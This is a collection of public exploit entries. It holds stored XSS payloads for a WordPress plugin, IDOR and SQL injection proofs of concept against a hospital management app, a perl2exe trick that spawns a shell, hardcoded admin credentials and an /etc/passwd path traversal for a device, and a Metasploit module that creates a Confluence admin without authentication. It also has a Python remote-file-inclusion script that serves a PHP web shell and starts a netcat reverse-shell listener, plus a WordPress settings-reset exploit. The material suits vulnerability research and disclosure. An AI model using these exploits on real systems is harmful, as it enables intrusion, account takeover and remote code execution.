<pre><code># Exploit Title: WordPress Plugin Admin Bar & Dashboard Access Control Version: 1.2.8 - "Dashboard Redirect" field Stored Cross-Site Scripting (XSS)<br /># Google Dork: NA<br /># Date: 28/10/2023<br /># Exploit Author: Rachit Arora<br /># Vendor Homepage: <br /># Software Link: https://wordpress.org/plugins/admin-bar-dashboard-control/<br /># Version: 1.2.8<br /># Category: Web Application<br /># Tested on: Windows<br /># CVE : 2023-47184<br /><br /><br />1. Install WordPress (latest)<br /><br />2. Install and activate Admin Bar & Dashboard Access Control.<br /><br />3. Navigate to "Admin Bar & Dash" >> Under Dashboard Access and in the "Dashboard Redirect" enter the payload into the input field.<br /><br />"onfocusin=alert``+autofocus><br />"onfocusin=alert`document.domain`+autofocus><br /><br />4. You will observe that the payload successfully got stored and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Hospital Management System - IDOR + Accaunt Takeover<br /># Google Dork: N/A<br /># Application: Hospital Management System<br /># Date: 27.02.2024<br /># Bugs: IDOR + Accaunt Takeover<br /># Exploit Author: SoSPiro<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html<br /># Version: 1.0<br /># Tested on: Windows 10 64 bit Wampserver <br /># CVE : N/A<br /><br /><br />## Vulnerability Description:<br /><br />This report focuses on two vulnerabilities known as "Insecure Direct Object References (IDOR)" and "Account Takeover". These vulnerabilities occur in a scenario where user input and access privileges validation is inadequate.<br /><br /><br />## Proof of Concept (PoC):<br /><br />Target User Information:<br /><br />User 1:<br />ID: 1<br />Email: patient@patient.com<br />Password: patient<br />-----------------------------------<br />User 2:<br />ID: 4<br />Email: attack@ker<br />Password: q1w2e3<br />-----------------------------------<br /><br /><br />User 1 Request<br /><br />POST /Vaidya%20Mitra/vm/patient/edit-user.php HTTP/1.1<br />Host: localhost<br />Cookie: _ga=GA1.1.2080672900.1708952048; _gid=GA1.1.1833914840.1708952048; PHPSESSID=f6je8gcsm0h685mfr2g37ot8to<br />...<br />id00=1&oldemail=patient%40patient.com&email=patient%40patient.com&name=Mrs.Sunita+Dighe&nic=422201&Tele=9090909091&address=India&password=patient&cpassword=patient<br /><br /><br />User 2 Request<br /><br />POST /Vaidya%20Mitra/vm/patient/edit-user.php HTTP/1.1<br />Host: localhost<br />Cookie: PHPSESSID=4c8per12a8freilu1upich92a4<br />...<br />id00=4&oldemail=attack%40ker&email=attack%40ker&name=attack+attacker&nic=123123123&Tele=0712345677&address=attac&password=q1w2e3&cpassword=q1w2e3<br /><br /><br /><br />Attacker's Request<br /><br />The attacker aims to modify the account details of "patient 1" and sends the following HTTP request:<br /><br />POST /Vaidya%20Mitra/vm/patient/edit-user.php HTTP/1.1<br />Host: localhost<br />Cookie: PHPSESSID=4c8per12a8freilu1upich92a4<br />...<br />id00=1&oldemail=patient%40patient.com&email=patient%40patient.com&name=MRRS.Sunita+Dighe&nic=422201&Tele=9090909091&address=attac&password=q1w2e3&cpassword=q1w2e3<br /><br /><br />In the above SQL queries, the $id value received from the user is directly included in the query and security <br />checks are not performed. This allows exploiting another user's information. At the same time, since <br />the user's identity is obtained from the POST data, the attacker can pass his identity as another user's identity.<br /><br /><br />PoC video: https://www.youtube.com/watch?v=pmoBSnu9IYI<br /><br /><br /><br />## Vulnerable code section:<br />====================================================<br /><br />$sql1="update patient set pemail='$email',pname='$name',ppassword='$password',pnic='$nic',ptel='$tele',paddress='$address' where pid=$id ;";<br />$database->query($sql1);<br />echo $sql1;<br />$sql1="update webuser set email='$email' where email='$oldemail' ;";<br />$database->query($sql1);<br />echo $sql1;<br />====================================================<br /><br /><br />## Risks This security vulnerability exposes user information to unauthorized access and modifications. Consequently, there are potential risks such as account takeover, privacy breaches, and non-compliance with security policies, which can lead to substantial damage and security breaches in the system.<br /></code></pre>
<pre><code># Exploit Title: Hospital Management System - SQL Injection<br /># Google Dork: N/A<br /># Application: Hospital Management System<br /># Date: 26.02.2024<br /># Bugs: SQL Injection <br /># Exploit Author: SoSPiro<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html<br /># Version: 1.0<br /># Tested on: Windows 10 64 bit Wampserver <br /># CVE : N/A<br /><br /><br />## Vulnerability Description:<br /><br />A security vulnerability has been identified in this web application due to the direct inclusion of user-input data into SQL queries, rendering it susceptible to SQL Injection attacks. This vulnerability may enable malicious actors to gain unauthorized access to sensitive information.<br /><br /><br />## Proof of Concept (PoC):<br /><br />Below is an example of an attack that a malicious actor could execute to exploit this vulnerability.<br /><br />POST /Vaidya%20Mitra/vm/login.php HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 80<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/Vaidya%20Mitra/vm/login.php<br />Cookie: _ga=GA1.1.2080672900.1708952048; _gid=GA1.1.1833914840.1708952048; PHPSESSID=18a16tga7k2glh7<br /><br />useremail=test@123.asd'%2b(select*from(select(sleep(5)))a)%2b'&userpassword=test<br /><br /><br />In this example, the payload appended to the useremail parameter aims to execute a sleep function, intentionally delaying the server's response time. Real-world attacks could involve more malicious operations.<br /><br /><br />Request - Response foto: https://i.imgur.com/LxENLBz.png<br /><br /><br />## Vulnerable code section:<br />====================================================<br />/Vaidya%20Mitra/vm/login.php<br /><br />$email = $_POST['useremail'];<br />$password = $_POST['userpassword'];<br /><br />$result = $database->query("select * from webuser where email='$email'");<br /><br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: Executables Created with perl2exe <= V30.10C - Arbitrary Code Execution<br /># Date: 10/17/2023<br /># Exploit Author: decrazyo<br /># Vendor Homepage: https://www.indigostar.com/<br /># Software Link: https://www.indigostar.com/download/p2x-30.10-Linux-x64-5.30.1.tar.gz<br /># Version: <= V30.10C<br /># Tested on: Ubuntu 22.04<br /><br /># Description:<br />perl2exe packs perl scripts into native executables.<br />Those executables use their 0th argument to locate a file to unpack and execute.<br />Because of that, such executables can be made to execute another executable that has been compiled with perl2exe by controlling the 0th argument.<br />That can be useful for breaking out of restricted shell environments.<br /><br /># Proof and Concept:<br />user@testing:~/example$ ls<br />p2x-30.10-Linux-x64-5.30.1.tar.gz perl2exe-Linux-x64-5.30.1<br />user@testing:~/example$ <br />user@testing:~/example$ # Create and pack a "safe" perl script to target with the attack.<br />user@testing:~/example$ echo 'print("I am completely safe\n");' > safe.pl<br />user@testing:~/example$ ./perl2exe-Linux-x64-5.30.1/perl2exe safe.pl<br />Perl2Exe V30.10C 2020-12-11 Copyright (c) 1997-2020 IndigoSTAR Software<br />...<br />Generating safe<br />user@testing:~/example$ <br />user@testing:~/example$ # Check that the program executes as expected.<br />user@testing:~/example$ ./safe<br />I am completely safe<br />user@testing:~/example$ <br />user@testing:~/example$ # Create and pack a "malicious" script that we want to execute.<br />user@testing:~/example$ echo 'print("j/k I am malicious AF\n");system("/bin/sh");' > malicious.pl<br />user@testing:~/example$ ./perl2exe-Linux-x64-5.30.1/perl2exe malicious.pl<br />Perl2Exe V30.10C 2020-12-11 Copyright (c) 1997-2020 IndigoSTAR Software<br />...<br />Generating malicious<br />user@testing:~/example$ <br />user@testing:~/example$ # Our "malicious" file doesn't need to have execution permissions.<br />user@testing:~/example$ chmod -x malicious<br />user@testing:~/example$ ./malicious<br />-bash: ./malicious: Permission denied<br />user@testing:~/example$ <br />user@testing:~/example$ # Execute the "safe" program with the name of the "malicious" program as the 0th argument.<br />user@testing:~/example$ # The "safe" program will unpack and execute the "malicious" program instead of itself.<br />user@testing:~/example$ bash -c 'exec -a malicious ./safe'<br />j/k I am malicious AF<br />$ pstree -s $$<br />systemd───sshd───sshd───sshd───bash───safe───sh───pstree<br />$<br /><br /></code></pre>
<pre><code># Exploit Title: Automatic-Systems SOC FL9600 FastLine - The device contains hardcoded login and password for super admin<br /># Google Dork: <br /># Date: 12/9/2023<br /># Exploit Author: Mike Jankowski-Lorek, Marcin Kozlowski / Cqure<br /># Vendor Homepage: http://automatic-systems.com<br /># Software Link: <br /># Version: V06<br /># Tested on: V06, VersionSVN = 28569_8a99acbd8d7ea09a57d5fbcb435da5427b3f6b8a<br /># CVE : CVE-2023-37608<br /><br />An issue in Automatic Systems SOC FL9600 FastLine version:V06 a remote attacker to obtain sensitive information via the admin login credentials.<br /><br />The device contains hardcoded login and password for super admin. The administrator cannot change the password for this account.<br /><br />Login: automaticsystems<br />Password: astech<br /><br /></code></pre>
<pre><code># Exploit Title: Automatic-Systems SOC FL9600 FastLine - Directory Transversal<br /># Google Dork: <br /># Date: 12/9/2023<br /># Exploit Author: Mike Jankowski-Lorek, Marcin Kozlowski / Cqure<br /># Vendor Homepage: http://automatic-systems.com<br /># Software Link: <br /># Version: V06<br /># Tested on: V06, VersionSVN = 28569_8a99acbd8d7ea09a57d5fbcb435da5427b3f6b8a<br /># CVE : CVE-2023-37607<br /><br />Request URL: http://<host>/csvServer.php?getList=1&dir=../../../../etc/&file=passwd<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control',<br /> 'Description' => %q{<br /> This module exploits a broken access control vulnerability in Atlassian Confluence servers leading to an authentication bypass.<br /> A specially crafted request can be create new admin account without authentication on the target Atlassian server.<br /> },<br /> 'Author' => [<br /> 'Unknown', # exploited in the wild<br /> 'Emir Polat' # metasploit module<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-22515'],<br /> ['URL', 'https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html'],<br /> ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-22515'],<br /> ['URL', 'https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis']<br /> ],<br /> 'DisclosureDate' => '2023-10-04',<br /> 'DefaultOptions' => {<br /> 'RPORT' => 8090<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path', '/']),<br /> OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username], regex: /^[a-z._@]+$/),<br /> OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]),<br /> OptString.new('NEW_EMAIL', [true, 'E-mail to be used when creating a new user with admin privileges', Faker::Internet.email])<br /> ])<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/login.action')<br /> )<br /> return Exploit::CheckCode::Unknown unless res<br /> return Exploit::CheckCode::Safe unless res.code == 200<br /><br /> poweredby = res.get_xml_document.xpath('//ul[@id="poweredby"]/li[@class="print-only"]/text()').first&.text<br /> return Exploit::CheckCode::Safe unless poweredby =~ /Confluence (\d+(\.\d+)*)/<br /><br /> confluence_version = Rex::Version.new(Regexp.last_match(1))<br /><br /> vprint_status("Detected Confluence version: #{confluence_version}")<br /><br /> if confluence_version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.3.2')) ||<br /> confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.2')) ||<br /> confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.1'))<br /> return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}")<br /> end<br /><br /> Exploit::CheckCode::Safe("Confluence version: #{confluence_version}")<br /> end<br /><br /> def run<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/server-info.action'),<br /> 'vars_get' => {<br /> 'bootstrapStatusProvider.applicationConfig.setupComplete' => 'false'<br /> }<br /> )<br /><br /> return fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Version vulnerable but setup is already completed') unless res&.code == 302 || res&.code == 200<br /><br /> print_good('Found server-info.action! Trying to ignore setup.')<br /><br /> created_user = create_admin_user<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'setup/finishsetup.action'),<br /> 'headers' => {<br /> 'X-Atlassian-Token' => 'no-check'<br /> }<br /> )<br /><br /> return fail_with(Msf::Exploit::Failure::NoAccess, 'The admin user could not be created. Try a different username.') unless created_user<br /><br /> print_warning('Admin user was created but setup could not be completed.') unless res&.code == 200<br /><br /> create_credential({<br /> workspace_id: myworkspace_id,<br /> origin_type: :service,<br /> module_fullname: fullname,<br /> username: datastore['NEW_USERNAME'],<br /> private_type: :password,<br /> private_data: datastore['NEW_PASSWORD'],<br /> service_name: 'Atlassian Confluence',<br /> address: datastore['RHOST'],<br /> port: datastore['RPORT'],<br /> protocol: 'tcp',<br /> status: Metasploit::Model::Login::Status::UNTRIED<br /> })<br /><br /> print_good("Admin user was created successfully. Credentials: #{datastore['NEW_USERNAME']} - #{datastore['NEW_PASSWORD']}")<br /> print_good("Now you can login as administrator from: http://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}login.action")<br /> end<br /><br /> def create_admin_user<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'setup/setupadministrator.action'),<br /> 'headers' => {<br /> 'X-Atlassian-Token' => 'no-check'<br /> },<br /> 'vars_post' => {<br /> 'username' => datastore['NEW_USERNAME'],<br /> 'fullName' => 'New Admin',<br /> 'email' => datastore['NEW_EMAIL'],<br /> 'password' => datastore['NEW_PASSWORD'],<br /> 'confirm' => datastore['NEW_PASSWORD'],<br /> 'setup-next-button' => 'Next'<br /> }<br /> )<br /> res&.code == 302<br /> end<br />end<br /> <br /></code></pre>
<pre><code># Exploit Title: Moodle 4.3 'id' Insecure Direct Object Reference (IDOR)<br /># Date: 20/10/2023<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://moodle.org/<br /># Software Demo: https://school.moodledemo.net/<br /># Version: 4.3+<br /># Tested on: Linux <br /><br /><br />Vulnerability Details<br />======================<br /><br />Steps :<br /><br />1. Log in to the application with the given credentials > USER: teacher PASS: moodle<br />2. In profile.php?id=11, modify the id Parameter to View User details,<br />Email address, Country, City/town, City, Timezone<br />3. Change the existing "id" value to another number <br /><br />https://school.moodledemo.net/user/profile.php?id=4<br />https://school.moodledemo.net/user/profile.php?id=5<br />https://school.moodledemo.net/user/profile.php?id=10<br />https://school.moodledemo.net/user/profile.php?id=50<br /><br />https://school.moodledemo.net/blog/index.php?userid=3<br />https://school.moodledemo.net/blog/index.php?userid=14<br /><br />https://school.moodledemo.net/mod/forum/user.php?id=53<br />https://school.moodledemo.net/mod/forum/user.php?id=50<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)<br /># Date: 04/11/2023<br /># Exploit Author: Leopoldo Angulo (leoanggal1)<br /># Vendor Homepage: https://wordpress.org/plugins/canto/<br /># Software Link: https://downloads.wordpress.org/plugin/canto.3.0.4.zip<br /># Version: All versions of Canto Plugin prior to 3.0.5<br /># Tested on: Ubuntu 22.04, Wordpress 6.3.2, Canto Plugin 3.0.4<br /># CVE : CVE-2023-3452<br /><br />#PoC Notes:<br />#The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. (Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-3452)<br />#This code exploits the improper handling of the wp_abspath variable in the following line of the "download.php" code:<br />#... require_once($_REQUEST['wp_abspath'] . '/wp-admin/admin.php'); ...<br />#This is just an example but there is this same misconfiguration in other lines of the vulnerable plugin files.<br /># More information in Leoanggal1's Github<br /><br />#!/usr/bin/python3<br />import argparse<br />import http.server<br />import socketserver<br />import threading<br />import requests<br />import os<br />import subprocess<br /><br /># Define the default web shell<br />default_web_shell = "<?php system($_GET['cmd']); ?>"<br /><br />def create_admin_file(local_dir, local_shell=None):<br /> if not os.path.exists(local_dir):<br /> os.makedirs(local_dir)<br /><br /> # If a local shell is provided, use it; otherwise, use the default web shell<br /> if local_shell:<br /> with open(f"{local_dir}/admin.php", "wb") as admin_file:<br /> with open(local_shell, "rb") as original_file:<br /> admin_file.write(original_file.read())<br /> else:<br /> with open(f"{local_dir}/admin.php", "w") as admin_file:<br /> admin_file.write(default_web_shell)<br /><br />def start_local_server(local_port):<br /> Handler = http.server.SimpleHTTPRequestHandler<br /> httpd = socketserver.TCPServer(("0.0.0.0", local_port), Handler)<br /><br /> print(f"Local web server on port {local_port}...")<br /> httpd.serve_forever()<br /><br /> return httpd<br /><br />def exploit_rfi(url, local_shell, local_host, local_port, command, nc_port):<br /> local_dir = "wp-admin"<br /> create_admin_file(local_dir, local_shell)<br /><br /> target_url = f"{url}/wp-content/plugins/canto/includes/lib/download.php"<br /> local_server = f"http://{local_host}:{local_port}"<br /> command = f"cmd={command}"<br /><br /> if local_shell:<br /> # If a local shell is provided, start netcat on the specified port<br /> subprocess.Popen(["nc", "-lvp", str(nc_port)])<br /><br /> server_thread = threading.Thread(target=start_local_server, args=(local_port,))<br /> server_thread.daemon = True<br /> server_thread.start()<br /><br /> exploit_url = f"{target_url}?wp_abspath={local_server}&{command}"<br /> print(f"Exploitation URL: {exploit_url}")<br /><br /> response = requests.get(exploit_url)<br /> print("Server response:")<br /> print(response.text)<br /><br /> # Shutdown the local web server<br /> print("Shutting down local web server...")<br /> server_thread.join()<br /><br />if __name__ == "__main__":<br /> examples = '''<br /> Examples:<br /> - Check the vulnerability<br /> python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33<br /><br /> - Execute a command<br /> python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -c 'id'<br /><br /> - Upload and run a reverse shell file. You can download it from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php or generate it with msfvenom.<br /> python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -s php-reverse-shell.php<br /> '''<br /> parser = argparse.ArgumentParser(description="Script to exploit the Remote File Inclusion vulnerability in the Canto plugin for WordPress - CVE-2023-3452", epilog=examples, formatter_class=argparse.RawDescriptionHelpFormatter)<br /> parser.add_argument("-u", "--url", required=True, default=None, help="Vulnerable URL")<br /> parser.add_argument("-s", "--shell", help="Local file for web shell")<br /> parser.add_argument("-LHOST", "--local_host", required=True, help="Local web server IP")<br /> parser.add_argument("-LPORT", "--local_port", help="Local web server port")<br /> parser.add_argument("-c", "--command", default="whoami", help="Command to execute on the target")<br /> parser.add_argument("-NC_PORT", "--nc_port", type=int, help="Listener port for netcat")<br /><br /> try:<br /> args = parser.parse_args()<br /><br /> if args.local_port is None:<br /> args.local_port = 8080 # Valor predeterminado si LPORT no se proporciona<br /> exploit_rfi(args.url, args.shell, args.local_host, int(args.local_port), args.command, args.nc_port)<br /><br /> except SystemExit:<br /> parser.print_help()<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: POC-CVE-2023-3244<br /># Date: 9/12/2023<br /># Exploit Author: Diaa Hanna<br /># Software Link: [download link if available]<br /># Version: <= 1.2.0 comments-like-dislike<br /># Tested on: 1.1.6 comments-like-dislike<br /># CVE : CVE-2023-3244<br /><br />#References<br />#https://nvd.nist.gov/vuln/detail/CVE-2023-3244<br /><br /><br />#The Comments Like Dislike plugin for WordPress has been found to have a vulnerability that allows unauthorized modification of data. This vulnerability arises due to a missing capability check on the restore_settings function, which is called through an AJAX action. The vulnerability affects versions up to and including 1.2.0 of the plugin.<br />#This security flaw enables authenticated attackers with minimal permissions, such as subscribers, to reset the plugin's settings. It's important to note that this issue was only partially patched in version 1.2.0, as the nonce (a security measure) is still accessible to subscriber-level users.<br />#For more detailed information about this bug, you can refer to the National Vulnerability Database (NVD) website at [CVE-2023-3244](https://nvd.nist.gov/vuln/detail/CVE-2023-3244).<br /><br />import requests <br />import argparse<br />import sys<br />from colorama import Fore<br /><br />parser = argparse.ArgumentParser(prog='POC-CVE-2023-3244',description='This is a proof of concept for the CVE-2023-3244 it is an access control vulnerability in the restore_settings function ')<br />parser.add_argument('-u','--username',help='username of a user on wordpress with low privileges',required=True)<br />parser.add_argument('-p',"--password",help='password of a user on wordpress with low privileges',required=True)<br />parser.add_argument('--url',help='the url of the vulnerable server (with http or https)',required=True)<br />parser.add_argument('--nossl',help='disable ssl verification',action='store_true',required=False,default=False)<br />args=parser.parse_args()<br /><br />#check if the domain ends with a '/' if not then add it<br />url=args.url<br />if url[-1] != '/':<br /> url+='/'<br /><br /><br /><br />wp_login = f'{url}wp-login.php'<br />wp_admin = f'{url}wp-admin/'<br />username = args.username <br />password = args.password <br /><br /><br />session=requests.Session()<br />#logging in<br />session.post(wp_login, headers={'Cookie':'wordpress_test_cookie=WP Cookie check'}, data={'log':username, 'pwd':password, 'wp-submit':'Log In', <br /> 'redirect_to':wp_admin, 'testcookie':'1' },verify=not (args.nossl))<br />#if failed to login<br />if len(session.cookies.get_dict()) == 2:<br /> print(Fore.RED +"Error Logging In Check Your Username and Password And Try Again")<br /> sys.exit(1)<br /><br />#making the ajax request to wp_ajax_cld_settings_restore_action this line will call the restore_settings function <br />#the restore_settings function does not check the sufficient privileges of a logged-in user <br />#even a subscriber can use this POC<br />response=session.get(f"{wp_admin}/admin-ajax.php?action=cld_settings_restore_action",verify=not (args.nossl))<br /><br />if response.text == "Settings restored successfully.Redirecting...":<br /> print(Fore.GREEN +"exploited excuted successfully")<br /> print(Fore.YELLOW+ "settings of the comments-like-dislike plugin should be defaulted on the server")<br /> sys.exit(0)<br />else:<br /> print(Fore.RED + "some error occurred please read the source code of the poc it isn't that long anyway")<br /> sys.exit(1)<br /> <br /><br /></code></pre>